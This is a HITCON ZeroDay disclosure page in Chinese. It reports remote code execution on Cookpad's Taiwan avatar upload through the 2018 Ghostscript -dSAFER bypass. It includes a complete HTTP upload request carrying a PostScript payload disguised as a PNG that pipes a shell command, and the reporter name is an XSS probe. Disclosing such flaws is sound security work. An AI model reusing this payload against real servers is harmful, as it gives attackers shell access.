Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01231
- Vendor: Cookpad
- Title: Cookpad 可上傳 Ghostscript 圖片導致 Remote Code Execution
- Introduction: Remote Code Execution
處理狀態
目前狀態
公開
Last Update : 2018/10/28
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/08/28 20:04:23 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/28 23:03:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 01:27:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 01:27:01 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 01:27:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 22:15:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 22:15:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/10/28 03:00:12 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01231
- 通報者:morrow (<svg/onload=alert(1)>)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://cookpad.com/tw/user/images
敘述
問題點發生在 https://cookpad.com/tw/user/images 上傳大頭照的地方
透過上傳一個 postscript 格式的圖片,就能直接拿到網站的 shell
POST /tw/user/images HTTP/1.1
Host: cookpad.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://cookpad.com/tw/%E4%BD%BF%E7%94%A8%E8%80%85/13723581/%E6%9B%B4%E6%94%B9
X-CSRF-Token: cEFL6ScahXWUu90eZt9YmsEpLN0/GsqG3+MVKzUBxuMlO4Q/HddK/lchzDWQtheTOJ9kcH4xsQvYCE/bP6R3pQ==
X-Requested-With: XMLHttpRequest
Content-Length: 410
Content-Type: multipart/form-data; boundary=---------------------------156297146284139173090990615
Connection: close
-----------------------------156297146284139173090990615
Content-Disposition: form-data; name="file"; filename="test.png"
Content-Type: image/png
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%sleep 10) currentdevice putdeviceprops
-----------------------------156297146284139173090990615--
主要可以執行的原因是因為 postscript 存在 -dSafer bypass 的漏洞,可以直接利用
這個問題可以參考 http://openwall.com/lists/oss-security/2018/08/21/2
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。